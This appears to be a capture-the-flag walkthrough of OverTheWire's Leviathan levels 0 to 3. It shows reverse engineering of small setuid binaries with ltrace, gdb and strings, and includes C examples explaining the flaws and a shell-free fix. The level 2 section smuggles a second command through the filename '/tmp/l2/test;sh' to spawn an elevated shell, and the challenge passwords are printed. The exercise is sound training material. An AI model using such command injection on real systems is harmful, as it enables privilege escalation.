OTW – Leviathan

These are security challenges from OverTheWire. Leviathan is a collection of levels that require common sense and basic Unix commands.

Leviathan Level 2 → Level 3

The printfile binary prints a file's contents on screen. However, trying to show the leviathan3 password results in a permission error.

./printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Let's run ltrace on it with the password file and see what happens.

ltrace ./printfile /etc/leviathan_pass/leviathan3
__libc_start_main(0x80484f4, 2, -10332, 0x80485d0, 0x8048640 <unfinished ...>
access("/etc/leviathan_pass/leviathan3", 4) = -1
puts("You cant have that file..."You cant have that file...
) = 27
+++ exited (status 1) +++

Let's see what happens when we use printfile correctly.

ltrace ./printfile /tmp/l2/test
__libc_start_main(0x80484f4, 2, -10316, 0x80485d0, 0x8048640 <unfinished ...>
access("/tmp/l2/test", 4) = 0
snprintf("/bin/cat /tmp/l2/test", 511, "/bin/cat %s", "/tmp/l2/test") = 21
system("/bin/cat /tmp/l2/test"
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++

Notice that it checks the access level first and then prints the file by running /bin/cat on the filename. The problem is that there is no input sanitizing, so we can craft a filename that runs additional commands. The first thing that comes to mind is appending a command to read the password file, but “/” is not allowed in a file name. So we can use “;” to add a second command that spawns a shell.
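To make the weakness in that call chain concrete, here is an added example (my own code, not the printfile binary from the level) that reproduces the `snprintf("/bin/cat %s", ...)` command building seen in the ltrace output and sets a shell-free alternative beside it. The sample argument `/tmp/l2/test;sh` is constructed to match the writeup. Two points the code is meant to show: `system()` hands the whole string to `/bin/sh`, so every shell metacharacter in the argument is live; and the robust fix is not a character filter but removing the shell entirely, so `open()` looks the name up literally. The `seteuid(getuid())` call is an assumption about how such a setuid helper should be written: it makes the later `open()` run with the caller's real UID, which is the same identity `access()` checked in the original.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Constructed sample argument of the kind the writeup uses: a valid file
 * name that is also a two-command shell list once pasted into a command. */
static const char SAMPLE_ARG[] = "/tmp/l2/test;sh";

/* Mirrors the snprintf() call seen in the ltrace output: the argument is
 * spliced verbatim into a command line that system() passes to /bin/sh.
 * Returns a pointer to a static buffer holding the resulting command. */
const char *build_cat_command(const char *path) {
    static char cmd[512];
    snprintf(cmd, sizeof cmd, "/bin/cat %s", path);
    return cmd;
}

/* Returns 1 if the argument contains a byte /bin/sh treats specially.
 * A deny-list like this is the weak fix (easy to get wrong); it is here only
 * to show what the original binary never checked at all. */
int has_shell_metachar(const char *s) {
    return strpbrk(s, ";|&$`\"'\\<>()*?[]{}~# \t\r\n") != NULL;
}

/* The robust fix: never involve a shell. Drop the effective UID to the
 * caller's real UID (assumed setuid context), then open the file and copy
 * it to out_fd in this process. A ';' in the name is just a byte in a path
 * that open() looks up literally. Returns 0 on success, -1 on error. */
int print_file_safely(const char *path, int out_fd) {
    if (seteuid(getuid()) != 0)
        return -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        ssize_t off = 0;
        while (off < n) {
            ssize_t w = write(out_fd, buf + off, (size_t)(n - off));
            if (w < 0) { close(fd); return -1; }
            off += w;
        }
    }
    close(fd);
    return n < 0 ? -1 : 0;
}

int main(int argc, char **argv) {
    const char *arg = argc > 1 ? argv[1] : SAMPLE_ARG;
    printf("system() would receive: %s\n", build_cat_command(arg));
    printf("shell metacharacters present: %s\n",
           has_shell_metachar(arg) ? "yes" : "no");
    /* With the sample argument this fails with "No such file", and no shell ran. */
    if (print_file_safely(arg, STDOUT_FILENO) != 0)
        perror(arg);
    return 0;
}
```

Run with no arguments to see the constructed sample, or pass a path of your own. The same principle applies if you really want `/bin/cat` to do the work: `fork()` and `execv("/bin/cat", argv)` with the file name as `argv[1]` also never consults a shell, so the name is delivered to cat as a single argument whatever bytes it contains.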

touch "/tmp/l2/test;sh"
./printfile "/tmp/l2/test;sh"

Once the shell spawns with the elevated permissions, we simply read the password file for the next level.

whoami
leviathan3

cat /etc/leviathan_pass/leviathan3
Ahdiemoo1j

Leviathan Level 1 → Level 2

From here on out, there is no information given about the levels. In the home directory there is an executable file called check, so let’s try it. A password prompt is displayed. I typed password and the reply was Wrong password.

./check
password: password
Wrong password, Good Bye ...

Let’s use gdb. When we disassemble main, we get the following:

Dump of assembler code for function main:
 0x080484f4 <+0>: push %ebp
 0x080484f5 <+1>: mov %esp,%ebp
 0x080484f7 <+3>: and $0xfffffff0,%esp
 0x080484fa <+6>: sub $0x30,%esp
 0x080484fd <+9>: mov %gs:0x14,%eax
 0x08048503 <+15>: mov %eax,0x2c(%esp)
 0x08048507 <+19>: xor %eax,%eax
 0x08048509 <+21>: movl $0x786573,0x24(%esp)
 0x08048511 <+29>: movl $0x72636573,0x14(%esp)
 0x08048519 <+37>: movw $0x7465,0x18(%esp)
 0x08048520 <+44>: movb $0x0,0x1a(%esp)
 0x08048525 <+49>: movl $0x646f67,0x28(%esp)
 0x0804852d <+57>: movl $0x65766f6c,0x1b(%esp)
 0x08048535 <+65>: movb $0x0,0x1f(%esp)
 0x0804853a <+70>: mov $0x8048690,%eax
 0x0804853f <+75>: mov %eax,(%esp)
 0x08048542 <+78>: call 0x80483d0 <printf@plt>
 0x08048547 <+83>: call 0x80483e0 <getchar@plt>
 0x0804854c <+88>: mov %al,0x20(%esp)
 0x08048550 <+92>: call 0x80483e0 <getchar@plt>
 0x08048555 <+97>: mov %al,0x21(%esp)
 0x08048559 <+101>: call 0x80483e0 <getchar@plt>
 0x0804855e <+106>: mov %al,0x22(%esp)
 0x08048562 <+110>: movb $0x0,0x23(%esp)
 0x08048567 <+115>: lea 0x24(%esp),%eax
 0x0804856b <+119>: mov %eax,0x4(%esp)
 0x0804856f <+123>: lea 0x20(%esp),%eax
 0x08048573 <+127>: mov %eax,(%esp)
 0x08048576 <+130>: call 0x80483c0 <strcmp@plt>
 0x0804857b <+135>: test %eax,%eax
 0x0804857d <+137>: jne 0x804858d <main+153>
 0x0804857f <+139>: movl $0x804869b,(%esp)
 0x08048586 <+146>: call 0x8048410 <system@plt>
 0x0804858b <+151>: jmp 0x8048599 <main+165>
 0x0804858d <+153>: movl $0x80486a3,(%esp)
 0x08048594 <+160>: call 0x8048400 <puts@plt>
 0x08048599 <+165>: mov $0x0,%eax
 0x0804859e <+170>: mov 0x2c(%esp),%edx
 0x080485a2 <+174>: xor %gs:0x14,%edx
 0x080485a9 <+181>: je 0x80485b0 <main+188>
 0x080485ab <+183>: call 0x80483f0 <__stack_chk_fail@plt>
 0x080485b0 <+188>: leave 
 0x080485b1 <+189>: ret

We can see a few functions, such as three getchar calls and strcmp. We test the three getchar calls by pressing enter three times after running the program; it immediately terminates with Wrong password. Running strings on the file lists all the readable strings, so we can look for a three-character word that is our password.

strings check
/lib/ld-linux.so.2
xRQ|
__gmon_start__
libc.so.6
_IO_stdin_used
puts
__stack_chk_fail
printf
getchar
system
strcmp
__libc_start_main
GLIBC_2.4
GLIBC_2.0
PTRh0
D$,1
D$$sex
secrf
D$(god
love
T$,e3
UWVS
[^_]
password: 
/bin/sh
Wrong password, Good Bye ...
;*2$"

There are a few choices; after trying them, the word sex works. I later found out that ltrace gives an even better solution: the library function strcmp is comparing against “sex”. When we execute the file with the password “sex”, the program spawns a shell.
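The disassembly and the strings output above are two views of the same bytes, and the link between them is worth working through. The `movl`/`movw`/`movb` stores at main+21 through main+65 write short string constants into the stack frame; on x86 an immediate is stored little-endian, so `movl $0x786573,0x24(%esp)` puts the bytes 0x73 0x65 0x78 0x00, i.e. “sex”, at 0x24(%esp). That is also why strings prints `D$$sex`: the instruction encodes as `C7 44 24 24 73 65 78 00`, and the ModRM/SIB/displacement bytes 0x44 0x24 0x24 happen to be the printable characters `D$$`, likewise `D$(god` for the store to 0x28(%esp). The added example below (my own code, not from the challenge) replays those stores into a model of the frame, recovers the four strings, and re-implements the comparison main performs: three getchar results go to 0x20..0x22, a NUL to 0x23, and strcmp runs against 0x24. It shows that “secret”, “love” and “god” are decoys that the code never compares against. The frame model and the newline-padding of short input are assumptions made to keep the example self-contained.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the 0x30-byte region main() reserves below %esp (sub $0x30,%esp).
 * Offsets are the 0xNN(%esp) displacements from the disassembly. */
static unsigned char frame[0x30];

/* x86 stores immediates little-endian: the lowest byte lands at the lowest
 * address, so movl $0x786573 writes 0x73 0x65 0x78 0x00 = "sex\0". */
static void store_le(unsigned off, uint32_t imm, unsigned nbytes) {
    for (unsigned i = 0; i < nbytes; i++)
        frame[off + i] = (unsigned char)(imm >> (8 * i));
}

/* Replays the movl/movw/movb stores from main+21 .. main+65. */
void build_frame(void) {
    memset(frame, 0, sizeof frame);
    store_le(0x24, 0x786573,   4);  /* "sex\0"  -> the real password */
    store_le(0x14, 0x72636573, 4);  /* "secr"                         */
    store_le(0x18, 0x7465,     2);  /* "et"     -> "secret"           */
    store_le(0x1a, 0x0,        1);  /* terminator                     */
    store_le(0x28, 0x646f67,   4);  /* "god\0"                        */
    store_le(0x1b, 0x65766f6c, 4);  /* "love"                         */
    store_le(0x1f, 0x0,        1);  /* terminator                     */
}

/* The C string that starts at a given %esp displacement in the rebuilt frame. */
const char *stack_string(unsigned off) {
    build_frame();
    return (const char *)frame + off;
}

/* Inverse direction: the 32-bit immediate a compiler emits for a literal of
 * up to four bytes, e.g. imm_for_string("sex") == 0x786573. */
uint32_t imm_for_string(const char *s) {
    uint32_t imm = 0;
    for (unsigned i = 0; i < 4 && s[i]; i++)
        imm |= (uint32_t)(unsigned char)s[i] << (8 * i);
    return imm;
}

/* The comparison main() performs: three getchar() results land at
 * 0x20..0x22, a NUL at 0x23, then strcmp() runs against 0x24.
 * Short input is padded with '\n' (pressing Enter). Returns 1 on match. */
int check_password(const char *typed) {
    build_frame();
    size_t len = strlen(typed);
    for (unsigned i = 0; i < 3; i++)
        frame[0x20 + i] = i < len ? (unsigned char)typed[i] : (unsigned char)'\n';
    frame[0x23] = 0;
    return strcmp((const char *)frame + 0x20, (const char *)frame + 0x24) == 0;
}

int main(void) {
    const char *candidates[] = { "sex", "god", "love", "secret" };
    for (size_t i = 0; i < 4; i++)
        printf("%-6s -> %s\n", candidates[i],
               check_password(candidates[i]) ? "shell" : "Wrong password");
    printf("stack strings: 0x14=%s 0x1b=%s 0x24=%s 0x28=%s\n",
           stack_string(0x14), stack_string(0x1b),
           stack_string(0x24), stack_string(0x28));
    return 0;
}
```

Reading the immediates this way is usually faster than trying every candidate from strings: the disassembly tells you which buffer strcmp actually receives (0x24(%esp), loaded by `lea 0x24(%esp),%eax`), and only the constant stored at that offset matters.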

ltrace ./check
__libc_start_main(0x80484f4, 1, -10268, 0x80485c0, 0x8048630 <unfinished ...>
printf("password: ") = 10
getchar(0x8048690, 32768, 0x8049ff4, 0x80485e1, -1password: sex
) = 115
getchar(0x8048690, 32768, 0x8049ff4, 0x80485e1, -1) = 101
getchar(0x8048690, 32768, 0x8049ff4, 0x80485e1, -1) = 120
strcmp("sex", "sex") = 0
system("/bin/sh"$

While in the elevated-permission shell, whoami shows that we are now leviathan2! Simply look for the next password in /etc/leviathan_pass/leviathan2 (similar to Bandit).

whoami
leviathan2

find / -user leviathan2 2>/dev/null
/etc/leviathan_pass/leviathan2
/home/leviathan1/check

cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Leviathan Level 0 → Level 1

Summary:
Difficulty:     1/10
Levels:         8
Platform:   Linux/x86

Author:
Anders Tonfeldt

Special Thanks:
We would like to thank AstroMonk for coming up with a replacement idea for the last level,
deadfood for finding a leveljump and Coi for finding a non-planned vulnerability.

Description:
This wargame doesn't require any knowledge about programming - just a bit of common
sense and some knowledge about basic *nix commands. We had no idea that it'd be this
hard to make an interesting wargame that wouldn't require programming abilities from 
the players. Hopefully we made an interesting challenge for the new ones.

From the home directory, there isn’t much except a hidden backup folder with a bookmarks.html file in it.

ls -al
total 24
drwxr-xr-x 3 root root 4096 Jun 6 2013 .
drwxr-xr-x 160 root root 4096 Jul 28 17:05 ..
drwxr-x--- 2 root leviathan0 4096 Jun 6 2013 .backup
-rw-r--r-- 1 root root 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 root root 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 root root 675 Apr 3 2012 .profile

cd .backup ; ls -al
total 144
drwxr-x--- 2 root leviathan0 4096 Jun 6 2013 .
drwxr-xr-x 3 root root 4096 Jun 6 2013 ..
-rw-r----- 1 root leviathan0 133259 Jun 6 2013 bookmarks.html

If you look into the file, you will find a legitimate HTML file with a lot of information. Since I had just freshly completed Bandit, I wondered if I was looking for the password for leviathan1 in this file. There it is: the password for the next level is right next to the username for the next level.

grep "leviathan1" bookmarks.html
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

That was surprisingly easy.